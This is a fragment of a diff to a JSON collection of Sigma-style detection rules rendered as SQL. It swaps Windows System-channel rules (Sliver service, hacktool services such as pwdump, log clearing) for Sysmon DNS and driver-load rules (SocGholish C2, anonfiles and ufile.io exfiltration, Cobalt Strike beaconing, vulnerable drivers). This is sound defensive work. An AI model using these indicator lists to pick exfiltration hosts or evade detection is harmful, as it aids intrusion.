ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * 
FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program 
Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": 
"frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unknown binary names of TeamViewer", + 
"Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the tool" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE 
'%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program 
Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", + "status": "experimental", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" - ], - "filename": "win_system_vul_cve_2020_1472.yml" - }, - { - "title": "Volume Shadow Copy Mount", - "id": "f512acbf-e662-4903-843e-97ce4652b740", - "status": "test", - "description": "Detects volume shadow copy mount via windows event log", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." 
- ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_volume_shadow_copy_mount.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.collection", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE 
'\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": 
"win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", - "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_pcap_drivers.yml" 
